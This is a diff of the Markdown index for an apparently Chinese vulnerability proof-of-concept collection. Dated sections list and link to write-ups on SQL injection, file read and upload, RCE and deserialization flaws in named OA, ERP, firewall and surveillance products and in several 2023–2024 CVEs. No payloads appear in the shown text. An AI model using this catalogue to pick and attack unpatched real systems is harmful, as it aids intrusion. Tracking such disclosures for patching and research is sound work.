[Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767](./Adobe%20ColdFusion/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md) +- [Fortinet-SSL-VPN-CVE-2024-21762](./Fortinet/Fortinet-SSL-VPN-CVE-2024-21762.md) +- [omfyUI follow_symlinks文件读取漏洞](./omfyUI/omfyUI%20follow_symlinks文件读取漏洞.md) +- [Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)](./Fortra/Fortra%20FileCatalyst%20Workflow远程代码执行漏漏洞(CVE-2024-25153).md) +- [联达OA uploadLogo.aspx存在任意文件上传](./联达OA/联达OA%20uploadLogo.aspx存在任意文件上传.md) +- [网络验证系统getInfo参数存在SQL注入漏洞](./网络验证系/网络验证系统getInfo参数存在SQL注入漏洞.md) +- [致远OA-ucpcLogin密码重置漏洞](./致远OA/致远OA-ucpcLogin密码重置漏洞.md) +- [Cobbler存在远程命令执行漏洞(CVE-2021-40323)](./Cobbler/Cobbler存在远程命令执行漏洞(CVE-2021-40323).md) +- 
[锐捷网络无线AC命令执行](./锐捷/锐捷网络无线AC命令执行.md) ## 2024.03.24 新增漏洞 -- 飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞 -- Netgear路由器boardDataWW.php存在RCE漏洞 -- 瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞 -- 福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞 -- 用友畅捷通RRATableController存在反序列化漏洞 -- 用友时空KSOA-imagefield接口存在SQL注入漏洞 -- F-logic_DataCube3存在任意文件上传漏洞 -- 泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞 -- 大华DSS城市安防监控平台Struct2-045命令执行漏洞 +- [飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞](./飞企互联/飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞.md) +- [Netgear路由器boardDataWW.php存在RCE漏洞](./路由器/Netgear路由器boardDataWW.php存在RCE漏洞.md) +- [瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞](./瑞友天翼应用虚拟化系统/瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞.md) +- [福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞](./福建科立讯通信/福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md) +- [用友畅捷通RRATableController存在反序列化漏洞](./用友OA/用友畅捷通RRATableController存在反序列化漏洞.md) +- [用友时空KSOA-imagefield接口存在SQL注入漏洞](./用友OA/用友时空KSOA-imagefield接口存在SQL注入漏洞.md) +- [F-logic_DataCube3存在任意文件上传漏洞](./F%20logic%20DataCube3/F-logic_DataCube3存在任意文件上传漏洞.md) +- [泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞](./泛微OA/泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞.md) +- [大华DSS城市安防监控平台Struct2-045命令执行漏洞](./大华/大华DSS城市安防监控平台Struct2-045命令执行漏洞.md) ## 2024.03.20 新增漏洞 -- 飞鱼星上网行为管理系统企业版前台RCE -- WordPress_Wholesale_Market插件存在任意文件读取漏洞 -- 万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞 -- 宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞 -- 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞 -- 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞 -- 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞 -- 用友NCCloud系统runScript存在SQL注入漏洞 +- [飞鱼星上网行为管理系统企业版前台RCE](./飞鱼星/飞鱼星上网行为管理系统企业版前台RCE.md) +- [WordPress_Wholesale_Market插件存在任意文件读取漏洞](./WordPress/WordPress_Wholesale_Market插件存在任意文件读取漏洞.md) +- [万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞.md) +- [宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞](./宏景OA/宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞.md) +- [正方教学管理信息服务平台ReportServer存在任意文件读取漏洞](./正方/正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md) +- 
[金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞](./金和OA/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md) +- [大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞](./大华/大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞.md) +- [用友NCCloud系统runScript存在SQL注入漏洞](./用友OA/用友NCCloud系统runScript存在SQL注入漏洞.md) ## 2024.03.14 新增漏洞 -- 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞 -- 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞 -- 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞 -- 用友U8_Cloud-base64存在SQL注入漏洞 -- 大华智慧园区综合管理平台pageJson存在SQL注入漏洞 -- 金蝶云-星空ServiceGateway反序列化漏洞 -- 友点建站系统image_upload.php存在文件上传漏洞 -- D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542) -- D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154) -- 中成科信票务管理平台任意文件上传漏洞 -- Springblade默认密钥可伪造凭据 -- CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞 +- [亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md) +- [亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md) +- [金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞](./金和OA/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md) +- [用友U8_Cloud-base64存在SQL注入漏洞](./用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md) +- [大华智慧园区综合管理平台pageJson存在SQL注入漏洞](./大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md) +- [金蝶云-星空ServiceGateway反序列化漏洞](./金蝶/金蝶云-星空ServiceGateway反序列化漏洞.md) +- [友点建站系统image_upload.php存在文件上传漏洞](./友点建站系统/友点建站系统image_upload.php存在文件上传漏洞.md) +- [D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)](./D-Link/D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542).md) +- [D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)](./D-Link/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md) +- [中成科信票务管理平台任意文件上传漏洞](./中成科信票务管理系统/中成科信票务管理平台任意文件上传漏洞.md) +- [Springblade默认密钥可伪造凭据](./SpringBlade/Springblade默认密钥可伪造凭据.md) +- [CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞](./路由器/CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞.md) ## 2024.03.12 新增漏洞 -- 宏景HCM-codesettree接口存在SQL注入漏洞 -- SpringBlade blade-log存在SQL 注入漏洞 -- 宏景HCM-downlawbase接口存在SQL注入漏洞 -- 天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞 -- H3C 用户自助服务平台 
dynamiccontent.properties.xhtml存在RCE漏洞 -- 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330) -- 大华智慧园区clientServer接口SQL注入漏洞 -- 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞 -- 网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞 -- 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022) -- 用友NC-saveDoc.ajax存在任意文件上传漏洞 -- 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞 -- 海康威视综合安防系统detection接口存在RCE漏洞 +- [宏景HCM-codesettree接口存在SQL注入漏洞 ](./宏景OA/宏景HCM-codesettree接口存在SQL注入漏洞.md) +- [SpringBlade blade-log存在SQL 注入漏洞](./SpringBlade/SpringBlade%20blade-log存在SQL%20注入漏洞.md) +- [宏景HCM-downlawbase接口存在SQL注入漏洞](./宏景OA/宏景HCM-downlawbase接口存在SQL注入漏洞.md) +- [天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md) +- [H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞](./H3C/H3C%20用户自助服务平台%20dynamiccontent.properties.xhtml存在RCE漏洞.md) +- [网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)](./网康科技/网康科技%20NS-ASG%20应用安全网关%20SQL注入漏洞(CVE-2024-2330).md) +- [大华智慧园区clientServer接口SQL注入漏洞](./大华/大华智慧园区clientServer接口SQL注入漏洞.md) +- [大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞](./大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md) +- [网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞](./网康科技/网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞.md) +- [网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)](./网康科技/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md) +- [用友NC-saveDoc.ajax存在任意文件上传漏洞](./用友OA/用友NC-saveDoc.ajax存在任意文件上传漏洞.md) +- [亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md) +- [海康威视综合安防系统detection接口存在RCE漏洞](./海康威视/海康威视综合安防系统detection接口存在RCE漏洞.md) ## 2024.03.05 新增漏洞 -- H3C-校园网自助服务系统flexfileupload任意文件上传漏洞 -- 绿盟日志审计系统存在命令执行漏洞 -- JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) -- H3C-SecParh堡垒机任意用户登录漏洞 -- 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞 -- 致远前台任意用户密码修改 -- JEEVMS仓库管理系统任意文件读取漏洞 -- 海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞 -- WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600) -- 大华EIMS-capture_handle接口远程命令执行漏洞 -- 帮管客CRM-jiliyu接口存在SQL漏洞 +- 
[H3C-校园网自助服务系统flexfileupload任意文件上传漏洞](./H3C/H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md) +- [绿盟日志审计系统存在命令执行漏洞](./绿盟/绿盟日志审计系统存在命令执行漏洞.md) +- [JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)](./JetBrains/JetBrains%20TeamCity%20身份验证绕过漏洞(CVE-2024-27198).md) +- [H3C-SecParh堡垒机任意用户登录漏洞](./H3C/H3C-SecParh堡垒机任意用户登录漏洞.md) +- [红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞](./红帆OA/红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md) +- [致远前台任意用户密码修改](./致远OA/致远前台任意用户密码修改.md) +- [JEEVMS仓库管理系统任意文件读取漏洞](./JEEVMS仓库管理系统/JEEVMS仓库管理系统任意文件读取漏洞.md) +- [海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞](./海康威视/海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞.md) +- [WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)](./WordPress/WordPress插件Bricks%20Builder存在RCE漏洞(CVE-2024-25600).md) +- [大华EIMS-capture_handle接口远程命令执行漏洞](./大华/大华EIMS-capture_handle接口远程命令执行漏洞.md) +- [帮管客CRM-jiliyu接口存在SQL漏洞](./帮管客CRM/帮管客CRM-jiliyu接口存在SQL漏洞.md) ## 2024.03.01 新增漏洞 -- RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞 -- RUOYI-v4.7.8存在远程代码执行漏洞 -- 西软云XMS-futurehotel-query接口存在XXE漏洞 -- 西软云XMS-futurehotel-operate接口存在XXE漏洞 -- 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞 -- 用友U9-UMWebService.asmx存在文件读取漏洞 -- 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞 -- 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞 -- 易宝OA系统DownloadFile接口存在文件读取漏洞 -- 浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞 -- 惠尔顿-网络安全审计系统存在任意文件读取漏洞 -- 蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞 +- [RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞](./锐捷/RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞.md) +- [RUOYI-v4.7.8存在远程代码执行漏洞](./RuoYi/RUOYI-v4.7.8存在远程代码执行漏洞.md) +- [西软云XMS-futurehotel-query接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-query接口存在XXE漏洞.md) +- [西软云XMS-futurehotel-operate接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-operate接口存在XXE漏洞.md) +- [宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞](./宏景OA/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md) +- [用友U9-UMWebService.asmx存在文件读取漏洞](./用友OA/用友U9-UMWebService.asmx存在文件读取漏洞.md) +- [用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞](./用友OA/用友U8%20Cloud-KeyWordReportQuery存在SQL注入漏洞.md) +- [用友U8 
Cloud-ArchiveVerify存在SQL注入漏洞](./用友OA/用友U8%20Cloud-ArchiveVerify存在SQL注入漏洞.md) +- [易宝OA系统DownloadFile接口存在文件读取漏洞](./易宝OA/易宝OA系统DownloadFile接口存在文件读取漏洞.md) +- [浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md) +- [惠尔顿-网络安全审计系统存在任意文件读取漏洞](./惠尔顿-网络安全审计系统/惠尔顿-网络安全审计系统存在任意文件读取漏洞.md) +- [蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞](./蓝凌OA/蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞.md) ## 2024.02.28 新增漏洞 -- 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞 -- 万户OA-RhinoScriptEngineService命令执行漏洞 -- 宏景 DisplayFiles任意文件读取 -- 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞 -- 用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞 -- aiohttp存在目录遍历漏洞(CVE-2024-23334) +- [鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞](./通天星/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md) +- [万户OA-RhinoScriptEngineService命令执行漏洞](./万户OA/万户OA-RhinoScriptEngineService命令执行漏洞.md) +- [宏景 DisplayFiles任意文件读取](./宏景OA/宏景%20DisplayFiles任意文件读取.md) +- [蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞](./蓝凌OA/蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md) +- [用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞](./用友OA/用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞.md) +- [aiohttp存在目录遍历漏洞(CVE-2024-23334)](./aiohttp/aiohttp存在目录遍历漏洞(CVE-2024-23334).md) ## 2024.02.17 新增漏洞 -- 宝塔最新未授权访问漏洞及sql注入 -- 金盘移动图书馆系统存在任意文件上传漏洞 -- Panalog大数据日志审计系统libres_syn_delete.php存在命令执行 -- WAGO系统远程代码执行漏洞(CVE-2023-1698) -- 山石网科云鉴存在前台任意命令执行漏洞 +- [宝塔最新未授权访问漏洞及sql注入](./宝塔/宝塔最新未授权访问漏洞及sql注入.md) +- [金盘移动图书馆系统存在任意文件上传漏洞](./金盘移动图书馆系统/金盘移动图书馆系统存在任意文件上传漏洞.md) +- [Panalog大数据日志审计系统libres_syn_delete.php存在命令执行](./Panalog/Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md) +- [WAGO系统远程代码执行漏洞(CVE-2023-1698)](./WAGO/WAGO系统远程代码执行漏洞(CVE-2023-1698).md) +- [山石网科云鉴存在前台任意命令执行漏洞](./山石网科云鉴/山石网科云鉴存在前台任意命令执行漏洞.md) ## 2024.02.5 新增漏洞 -- 天翼应用虚拟化系统sql注入漏洞 -- LinkWeChat任意文件读取漏洞 -- Weblogic远程代码执行(CVE-2024-20931) -- 亿赛通-dataSearch.jsp-SQL注入 +- [天翼应用虚拟化系统sql注入漏洞](./天翼应用虚拟化系统/天翼应用虚拟化系统sql注入漏洞.md) +- [LinkWeChat任意文件读取漏洞](./LinkWeChat/LinkWeChat任意文件读取漏洞.md) +- 
[Weblogic远程代码执行(CVE-2024-20931)](./Weblogic/Weblogic远程代码执行(CVE-2024-20931).md) +- [亿赛通-dataSearch.jsp-SQL注入](./亿赛通电子文档安全管理系统/亿赛通-dataSearch.jsp-SQL注入.md) ## 2024.02.2 新增漏洞 -- 亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞 -- 亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞 -- 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞 -- 大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞 -- 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞 +- [亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统%20UploadFileToCatalog%20SQL注入漏洞.md) +- [亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞.md) +- [亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md) +- [大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞](./大华/大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md) +- [飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md) ## 2024.01.26 新增漏洞 -- Jenkins任意文件读取漏洞(CVE-2024-23897) -- SpringBlade export-user SQL 注入漏洞 -- 万户OA text2Html接口存在任意文件读取漏洞 -- 亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞 -- 用友系统-U9企业版存在任意文件上传漏洞 -- 广联达-linkworks-gwgdwebservice存在SQL注入漏洞 -- 远秋医学培训系统未授权查看密码 -- 联软安全数据交换系统任意文件读取 -- Apache Tomcat存在信息泄露漏洞( CVE-2024-21733) +- [Jenkins任意文件读取漏洞(CVE-2024-23897)](./Jenkins/Jenkins任意文件读取漏洞(CVE-2024-23897).md) +- [SpringBlade export-user SQL 注入漏洞](./SpringBlade/SpringBlade%20export-user%20SQL%20注入漏洞.md) +- [万户OA text2Html接口存在任意文件读取漏洞](./万户OA/万户OA%20text2Html接口存在任意文件读取漏洞.md) +- [亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞.md) +- [用友系统-U9企业版存在任意文件上传漏洞](./用友OA/用友系统-U9企业版存在任意文件上传漏洞.md) +- [广联达-linkworks-gwgdwebservice存在SQL注入漏洞](./广联达OA/广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md) +- [远秋医学培训系统未授权查看密码](./远秋医学培训系统/远秋医学培训系统未授权查看密码.md) +- [联软安全数据交换系统任意文件读取](./联软/联软安全数据交换系统任意文件读取.md) +- [Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)](./Apache/Apache%20Tomcat存在信息泄露漏洞(%20CVE-2024-21733).md) ## 2024.01.17 新增漏洞 -- Yearning_front任意文件读取 -- 云网OA8.6存在fastjson反序列化漏洞 -- Apache 
Dubbo-admin-authorized-bypass (CNVD-2023-96546) -- 先锋WEB燃气收费系统文件上传漏洞 -- MRCMS3.0任意文件读取漏洞 -- 奇安信天擎rptsvr任意文件上传 -- 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞 -- Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887) -- 天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞 -- 用友移动系统管理getFileLocal接口存在任意文件读取 -- 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞 -- Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527) -- Laykefu客服系统任意文件上传漏洞 +- [Yearning_front任意文件读取](./Yearning/Yearning_front任意文件读取.md) +- [云网OA8.6存在fastjson反序列化漏洞](./云网OA/云网OA8.6存在fastjson反序列化漏洞.md) +- [Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)](./Apache/Apache%20Dubbo-admin-authorized-bypass%20(CNVD-2023-96546).md) +- [先锋WEB燃气收费系统文件上传漏洞](./先锋WEB燃气收费系统/先锋WEB燃气收费系统文件上传漏洞.md) +- [MRCMS3.0任意文件读取漏洞](./MRCMS/MRCMS3.0任意文件读取漏洞.md) +- [奇安信天擎rptsvr任意文件上传](./天擎/奇安信天擎rptsvr任意文件上传.md) +- [用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞](./用友OA/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md) +- [Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887)](./Ivanti/Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md) +- [天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞](./天擎/天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞.md) +- [用友移动系统管理getFileLocal接口存在任意文件读取](./用友OA/用友移动系统管理getFileLocal接口存在任意文件读取.md) +- [网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞](./网神/网神SecGate%203600%20防火墙sys_hand_upfile%20任意文件上传漏洞.md) +- [Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)](./Confluence/Atlassian%20Confluence%20远程代码执行漏洞(CVE-2023-22527).md) +- [Laykefu客服系统任意文件上传漏洞](./Laykefu客服系统/Laykefu客服系统任意文件上传漏洞.md) ## 2024.01.12 新增漏洞 -- GitLab任意用户密码重置漏洞(CVE-2023-7028) -- SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195) -- 亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞 -- 金和OA_SAP_B1Config.aspx未授权访问漏洞 -- 致远OA_getAjaxDataServlet接口存在任XXE漏洞 -- 金和OA_jc6_ntko-upload任意文件上传漏洞 -- 蓝凌EIS智慧协同平台多个接口SQL注入 -- 金和OA_CarCardInfo.aspx_SQL注入漏洞 -- 金和OA_MailTemplates.aspx_SQL注入漏洞 -- 金和OA_upload_json.asp存在任意文件上传漏洞 -- 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞 -- Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305) -- 金和OA_jc6_Upload任意文件上传 -- Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290) -- 浙大恩特客户资源管理系统crmbasicaction任意文件上传 +- 
[GitLab任意用户密码重置漏洞(CVE-2023-7028)](./GitLab/GitLab任意用户密码重置漏洞(CVE-2023-7028).md) +- [SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)](./SpiderFlow爬虫平台/SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md) +- [亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞.md) +- [金和OA_SAP_B1Config.aspx未授权访问漏洞](./金和OA/金和OA_SAP_B1Config.aspx未授权访问漏洞.md) +- [致远OA_getAjaxDataServlet接口存在任XXE漏洞](./致远OA/致远OA_getAjaxDataServlet接口存在任XXE漏洞.md) +- [金和OA_jc6_ntko-upload任意文件上传漏洞](./金和OA/金和OA_jc6_ntko-upload任意文件上传漏洞.md) +- [蓝凌EIS智慧协同平台多个接口SQL注入](./蓝凌OA/蓝凌EIS智慧协同平台多个接口SQL注入.md) +- [金和OA_CarCardInfo.aspx_SQL注入漏洞](./金和OA/金和OA_CarCardInfo.aspx_SQL注入漏洞.md) +- [金和OA_MailTemplates.aspx_SQL注入漏洞](./金和OA/金和OA_MailTemplates.aspx_SQL注入漏洞.md) +- [金和OA_upload_json.asp存在任意文件上传漏洞](./金和OA/金和OA_upload_json.asp存在任意文件上传漏洞.md) +- [金和OA_uploadfileeditorsave接口存在任意文件上传漏洞](./金和OA/金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md) +- [Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)](./Ncast高清智能录播系统/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md) +- [金和OA_jc6_Upload任意文件上传](./金和OA/金和OA_jc6_Upload任意文件上传.md) +- [Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290)](./Apache/Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290).md) +- [浙大恩特客户资源管理系统crmbasicaction任意文件上传](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md) ## 2024.01.09 新增漏洞 -- 金和OA_HomeService.asmxSQL注入 -- 用友移动管理平台uploadIcon任意文件上传漏洞 -- 捷诚管理信息系统sql注入漏洞 -- 奇安信网康下一代防火墙directdata存在远程命令执行漏洞 +- [金和OA_HomeService.asmxSQL注入](./金和OA/金和OA_HomeService.asmxSQL注入.md) +- [用友移动管理平台uploadIcon任意文件上传漏洞](./用友OA/用友移动管理平台uploadIcon任意文件上传漏洞.md) +- [捷诚管理信息系统sql注入漏洞](./捷诚管理信息系统/捷诚管理信息系统sql注入漏洞.md) +- [奇安信网康下一代防火墙directdata存在远程命令执行漏洞](./天擎/奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md) ## 2024.01.05 新增漏洞 -- 用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入 -- IDocView_qJvqhFt接口任意文件读取 -- ⻜企互联loginService任意登录 -- 全程云OA__ajax.ashxSQL注入漏洞 -- 泛微移动管理平台lang2sql接口任意文件上传 -- 广联达OA任意用户登录 -- 广联达OA前台任意文件上传 -- 金蝶EAS_pdfviewlocal任意文件读取漏洞 -- PbootCMS全版本后台通杀任意代码执行漏洞 +- [用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入](./用友OA/用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入.md) +- 
[IDocView_qJvqhFt接口任意文件读取](./iDocView/IDocView_qJvqhFt接口任意文件读取.md) +- [⻜企互联loginService任意登录](./飞企互联/⻜企互联loginService任意登录.md) +- [全程云OA__ajax.ashxSQL注入漏洞](./全程云OA/全程云OA__ajax.ashxSQL注入漏洞.md) +- [泛微移动管理平台lang2sql接口任意文件上传](./泛微OA/泛微移动管理平台lang2sql接口任意文件上传.md) +- [广联达OA任意用户登录](./广联达OA/广联达OA任意用户登录.md) +- [广联达OA前台任意文件上传](./广联达OA/广联达OA前台任意文件上传.md) +- [金蝶EAS_pdfviewlocal任意文件读取漏洞](./金蝶/金蝶EAS_pdfviewlocal任意文件读取漏洞.md) +- [PbootCMS全版本后台通杀任意代码执行漏洞](./PbootCMS/PbootCMS全版本后台通杀任意代码执行漏洞.md) ## 2024.01.03 新增漏洞 -- 天融信TOPSEC_maincgi.cgi远程命令执行 -- 天融信TOPSEC_static_convert远程命令执行漏洞 -- 用友CRM系统存在逻辑漏洞直接登录后台 -- 亿赛通电子文档uploadFile接口文件上传漏洞 +- [天融信TOPSEC_maincgi.cgi远程命令执行](./天融信/天融信TOPSEC_maincgi.cgi远程命令执行.md) +- [天融信TOPSEC_static_convert远程命令执行漏洞](./天融信/天融信TOPSEC_static_convert远程命令执行漏洞.md) +- [用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台](./用友OA/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md) +- [亿赛通电子文档uploadFile接口文件上传漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档uploadFile接口文件上传漏洞.md) ## 2023.12.31 新增漏洞 -- OfficeWeb365_任意文件读取漏洞 -- 东华医疗协同办公系统反序列化漏洞 -- 东华医疗协同办公系统文件上传 -- 飞企互联-FE企业运营管理平台登录绕过漏洞 -- 飞企互联Ognl表达式注入导致RCE -- 西软云XMS反序列化漏洞 -- 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞 -- 用友NC_Cloud_soapFormat.ajax接口存在XXE +- [OfficeWeb365_任意文件读取漏洞](./OfficeWeb365/OfficeWeb365_任意文件读取漏洞.md) +- [东华医疗协同办公系统反序列化漏洞](./东华医疗协同办公系统/东华医疗协同办公系统反序列化漏洞.md) +- 